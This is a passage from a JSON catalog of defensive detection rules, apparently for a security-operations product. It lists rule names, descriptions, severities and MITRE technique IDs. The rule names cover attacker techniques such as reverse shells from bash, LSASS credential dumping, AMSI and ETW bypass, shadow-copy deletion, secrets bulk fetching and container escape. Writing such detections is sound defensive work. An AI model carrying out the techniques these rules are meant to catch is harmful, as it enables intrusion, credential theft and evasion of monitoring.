tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1052" ], "log_source": "windows", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/printer-mass-print-confidential.yaml" }, { "id": "det-data-exfil-014", "type": "detection", "name": "Bulk Zip Creation on File Server", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Bulk Zip Creation on File Server'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1560.001" ], "log_source": "edr", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/bulk-zip-on-fileserver.yaml" }, { "id": "det-data-exfil-015", "type": "detection", "name": "Bulk Mailbox Export From M365 Compliance Center", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Bulk Mailbox Export From M365 Compliance Center'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1114.002" ], "log_source": "azure", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/bulk-msg-export-mail.yaml" }, { "id": "det-data-exfil-016", "type": "detection", "name": "Inbox Rule Forwarding to External Address", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Inbox Rule Forwarding to External Address'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1114.003" ], "log_source": "azure", "playbook": "tpl-account-compromise", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/exchange-mail-forward-external.yaml" }, { "id": "det-data-exfil-017", "type": "detection", "name": "Backup Export to Non-Allowlisted Destination", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Backup Export to Non-Allowlisted Destination'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1567" ], "log_source": "cloud", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/backup-export-anomalous.yaml" }, { "id": "det-data-exfil-018", "type": "detection", "name": "Container Image Mass Export to External Registry", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Container Image Mass Export to External Registry'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1567" ], "log_source": "cloud", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/container-mass-image-export.yaml" }, { "id": "det-data-exfil-019", "type": "detection", "name": "VPN Tunnel Large Download from Foreign Country", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'VPN Tunnel Large Download from Foreign Country'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "data-exfil", "mitre_techniques": [ "T1041" ], "log_source": "vpn", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/vpn-large-download-foreign.yaml" }, { "id": "det-data-exfil-020", "type": "detection", "name": "Secrets Manager Bulk Fetch by Human Principal", "description": "AiSOC v1 curated detection. Triggers on the data-exfil signal described by 'Secrets Manager Bulk Fetch by Human Principal'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "data-exfil", "mitre_techniques": [ "T1555", "T1530" ], "log_source": "cloud", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/data-exfil/secrets-mass-fetch.yaml" }, { "id": "det-endpoint-001", "type": "detection", "name": "LOLBAS Binary Used for Download or Execution", "description": "Detects living-off-the-land binaries (LOLBAS) being used to download payloads or execute remote code. These binaries are commonly abused because they are Microsoft-signed operating-system components that naive application allowlisting permits; the binary name alone is a weak signal, so the parent process and command-line arguments carry most of the fidelity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/lolbas-execution.yaml" }, { "id": "det-endpoint-002", "type": "detection", "name": "LSASS Memory Read by Untrusted Process", "description": "Detects when a process reads LSASS memory with access masks consistent with credential extraction (Mimikatz-style). 
LSASS holds credential material in memory (NTLM hashes, Kerberos tickets and keys, and in some configurations plaintext passwords); read access from anything other than allowlisted security and management software is a strong compromise indicator.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1003.001" ], "log_source": "edr", "playbook": "tpl-credential-theft", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/credential-dumping-lsass.yaml" }, { "id": "det-endpoint-003", "type": "detection", "name": "Mass File Extension Rename Indicative of Ransomware", "description": "Detects bulk file rename operations where file extensions are changed to novel patterns within a short time window. This is a high-fidelity indicator of ransomware encryption activity; bulk renames by backup, migration, or archival tooling are the main legitimate source and should be allowlisted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1486" ], "log_source": "edr", "playbook": "tpl-ransomware", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/ransomware-file-extension-change.yaml" }, { "id": "det-endpoint-004", "type": "detection", "name": "Office Application Spawns Shell or Scripting Engine", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Office Application Spawns Shell or Scripting Engine'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059", "T1204.002" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/office-spawn-shell.yaml" }, { "id": "det-endpoint-005", "type": "detection", "name": "PowerShell with Encoded Command and Bypass Flag", "description": "AiSOC v1 curated detection. 
Triggers when PowerShell is launched with an encoded command together with an execution-policy bypass flag, a combination that hides the script body from command-line inspection and is rare in routine administration. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059.001", "T1027" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/powershell-encoded-command.yaml" }, { "id": "det-endpoint-006", "type": "detection", "name": "Process Created via WMI by Non-Admin Tool", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Process Created via WMI by Non-Admin Tool'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1047" ], "log_source": "edr", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/wmi-process-creation.yaml" }, { "id": "det-endpoint-007", "type": "detection", "name": "Scheduled Task Created Pointing to Suspicious Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Scheduled Task Created Pointing to Suspicious Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1053.005" ], "log_source": "edr", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/scheduled-task-create-suspicious.yaml" }, { "id": "det-endpoint-008", "type": "detection", "name": "Persistence via Registry Run Key Write", "description": "AiSOC v1 curated detection. 
Triggers on the endpoint signal described by 'Persistence via Registry Run Key Write'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547.001" ], "log_source": "edr", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/registry-runkey-write.yaml" }, { "id": "det-endpoint-009", "type": "detection", "name": "New Service Installed with Suspicious Binary Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'New Service Installed with Suspicious Binary Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.003" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/service-install-binary-suspicious.yaml" }, { "id": "det-endpoint-010", "type": "detection", "name": "Binary Written to ADMIN$ via SMB", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Binary Written to ADMIN$ via SMB'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1021.002" ], "log_source": "edr", "playbook": "tpl-lateral-movement", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/psexec-style-binary-write-admin-share.yaml" }, { "id": "det-endpoint-011", "type": "detection", "name": "EDR / AV Service Stopped or Unloaded", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'EDR / AV Service Stopped or Unloaded'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "edr", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/edr-unload-attempt.yaml" }, { "id": "det-endpoint-012", "type": "detection", "name": "Volume Shadow Copies Deleted", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Volume Shadow Copies Deleted'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1490" ], "log_source": "edr", "playbook": "tpl-ransomware", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/shadow-copy-deletion.yaml" }, { "id": "det-endpoint-013", "type": "detection", "name": "Windows Event Log Cleared", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Windows Event Log Cleared'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1070.001" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/windows-event-log-cleared.yaml" }, { "id": "det-endpoint-014", "type": "detection", "name": "Host Firewall Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Host Firewall Disabled'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.004" ], "log_source": "edr", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/firewall-disabled-host.yaml" }, { "id": "det-endpoint-015", "type": "detection", "name": "Cross-Process Remote Thread Injection", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Cross-Process Remote Thread Injection'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1055" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/process-injection-cross-process-thread.yaml" }, { "id": "det-endpoint-016", "type": "detection", "name": "AMSI Bypass via DLL or Reflective Patch", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'AMSI Bypass via DLL or Reflective Patch'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.001" ], "log_source": "edr", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/amsi-bypass.yaml" }, { "id": "det-endpoint-017", "type": "detection", "name": "ETW Tampering / Logging Disable", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'ETW Tampering / Logging Disable'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1562.006" ], "log_source": "edr", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/etw-tampering.yaml" }, { "id": "det-endpoint-018", "type": "detection", "name": "Hosts File Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Hosts File Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1565.001" ], "log_source": "edr", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/host-files-modified.yaml" }, { "id": "det-endpoint-019", "type": "detection", "name": "DLL Loaded with Invalid or Untrusted Signature", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'DLL Loaded with Invalid or Untrusted Signature'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1574.002" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/image-load-suspicious-signing.yaml" }, { "id": "det-endpoint-020", "type": "detection", "name": "DLL Loaded From Network Share", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'DLL Loaded From Network Share'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1574.002" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/remote-image-load-from-share.yaml" }, { "id": "det-endpoint-021", "type": "detection", "name": "SUID/SGID Binary Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SUID/SGID Binary Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1548.001" ], "log_source": "linux", "playbook": "tpl-privilege-escalation", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/suid-binary-creation.yaml" }, { "id": "det-endpoint-022", "type": "detection", "name": "Kernel Module Loaded from Non-Standard Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Kernel Module Loaded from Non-Standard Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547.006" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/kernel-module-load-suspicious.yaml" }, { "id": "det-endpoint-023", "type": "detection", "name": "Cron Job Created Pointing to /tmp or /dev/shm", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Cron Job Created Pointing to /tmp or /dev/shm'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1053.003" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/cronjob-suspicious-path.yaml" }, { "id": "det-endpoint-024", "type": "detection", "name": "Shell Spawned by Web Server Process", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Shell Spawned by Web Server Process'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1059.004", "T1505.003" ], "log_source": "linux", "playbook": "tpl-webshell", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/shell-from-web-server.yaml" }, { "id": "det-endpoint-025", "type": "detection", "name": "Reverse Shell Pattern from /bin/bash", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Reverse Shell Pattern from /bin/bash'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1059.004" ], "log_source": "linux", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/reverse-shell-bash.yaml" }, { "id": "det-endpoint-026", "type": "detection", "name": "Unix User Added with Login Shell", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Unix User Added with Login Shell'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1136.001" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/user-add-suspicious.yaml" }, { "id": "det-endpoint-027", "type": "detection", "name": "SSH authorized_keys File Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'SSH authorized_keys File Modified'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1098.004" ], "log_source": "linux", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/ssh-key-added-authorized.yaml" }, { "id": "det-endpoint-028", "type": "detection", "name": "Container Launched with --privileged Flag", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Launched with --privileged Flag'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "linux", "playbook": "tpl-container-escape", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-privileged-launch.yaml" }, { "id": "det-endpoint-029", "type": "detection", "name": "Container Mounts Host Filesystem at /host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Container Mounts Host Filesystem at /host'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1611" ], "log_source": "kubernetes", "playbook": "tpl-container-escape", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/container-mount-host-fs.yaml" }, { "id": "det-endpoint-030", "type": "detection", "name": "kubectl exec Into Production Namespace by Non-Operator", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'kubectl exec Into Production Namespace by Non-Operator'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1609" ], "log_source": "kubernetes", "playbook": "tpl-cloud-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/kube-exec-into-prod-pod.yaml" }, { "id": "det-endpoint-031", "type": "detection", "name": "macOS LaunchAgent or LaunchDaemon Plist Created", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS LaunchAgent or LaunchDaemon Plist Created'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.001", "T1543.004" ], "log_source": "macos", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-launchagent-write.yaml" }, { "id": "det-endpoint-032", "type": "detection", "name": "macOS TCC Bypass Pattern (Direct DB Write)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS TCC Bypass Pattern (Direct DB Write)'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1556.006" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-tcc-bypass-attempt.yaml" }, { "id": "det-endpoint-033", "type": "detection", "name": "Suspicious AppleScript Execution via osascript", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Suspicious AppleScript Execution via osascript'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1059.002" ], "log_source": "macos", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-osascript-spawn.yaml" }, { "id": "det-endpoint-034", "type": "detection", "name": "macOS Gatekeeper Disabled", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Gatekeeper Disabled'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1553.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-gatekeeper-disabled.yaml" }, { "id": "det-endpoint-035", "type": "detection", "name": "macOS Quarantine Attribute Stripped", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'macOS Quarantine Attribute Stripped'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1553.001" ], "log_source": "macos", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/macos-codesign-bypass.yaml" }, { "id": "det-endpoint-036", "type": "detection", "name": "Browser Extension Installed Outside Allowlist", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Browser Extension Installed Outside Allowlist'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1176" ], "log_source": "edr", "playbook": "tpl-account-anomaly", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/browser-extension-installed-suspicious.yaml" }, { "id": "det-endpoint-037", "type": "detection", "name": "USB Mass-Storage Device Attached to Restricted Host", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'USB Mass-Storage Device Attached to Restricted Host'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1052.001" ], "log_source": "edr", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/usb-device-mass-storage-attached.yaml" }, { "id": "det-endpoint-038", "type": "detection", "name": "Remote Management Tool Installed Outside Allowlist", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Remote Management Tool Installed Outside Allowlist'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1219" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/rmm-tool-install.yaml" }, { "id": "det-endpoint-039", "type": "detection", "name": "Driver Signed by Microsoft Loaded with Vulnerable Hash (BYOVD)", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Driver Signed by Microsoft Loaded with Vulnerable Hash (BYOVD)'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "critical", "category": "endpoint", "mitre_techniques": [ "T1068" ], "log_source": "edr", "playbook": "tpl-malware-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/drivers-loaded-suspicious.yaml" }, { "id": "det-endpoint-040", "type": "detection", "name": "Screen-Capture Tool Use on Sensitive Workstation", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Screen-Capture Tool Use on Sensitive Workstation'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1113" ], "log_source": "edr", "playbook": "tpl-data-exfil", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/screen-capture-tool.yaml" }, { "id": "det-endpoint-041", "type": "detection", "name": "Windows Service Created With Suspicious BinaryPath", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Windows Service Created With Suspicious BinaryPath'. 
Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.003" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-service-create-suspicious-binpath.yaml" }, { "id": "det-endpoint-042", "type": "detection", "name": "Windows Service Image Path Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Windows Service Image Path Modified'. Watch the 2 documented false-positive cases before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1543.003", "T1574" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-service-modify-image-path.yaml" }, { "id": "det-endpoint-043", "type": "detection", "name": "Windows svchost.exe Loaded DLL From User Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Windows svchost.exe Loaded DLL From User Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1574.002" ], "log_source": "windows", "playbook": "tpl-defense-evasion", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-service-svchost-loaded-suspicious-dll.yaml" }, { "id": "det-endpoint-044", "type": "detection", "name": "Scheduled Task Created From Office or Browser", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Scheduled Task Created From Office or Browser'. 
Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1053.005" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-task-create-from-untrusted-process.yaml" }, { "id": "det-endpoint-045", "type": "detection", "name": "Scheduled Task Runs Encoded PowerShell", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Scheduled Task Runs Encoded PowerShell'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1053.005", "T1027" ], "log_source": "windows", "playbook": "tpl-execution", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-task-runs-encoded-powershell.yaml" }, { "id": "det-endpoint-046", "type": "detection", "name": "Registry Run Key Points To Temp Path", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Registry Run Key Points To Temp Path'. Watch the 1 documented false-positive case before tuning.", "version": "1.0.0", "author": "AiSOC", "tags": [ "tlp.white" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1547.001" ], "log_source": "windows", "playbook": "tpl-persistence", "verified": true, "source": "core", "tier": "stable", "enabled": true, "path": "detections/endpoint/win-runkey-write-binary-temp.yaml" }, { "id": "det-endpoint-047", "type": "detection", "name": "Registry RunOnceEx Key Modified", "description": "AiSOC v1 curated detection. Triggers on the endpoint signal described by 'Registry RunOnceEx Key Modified'. 
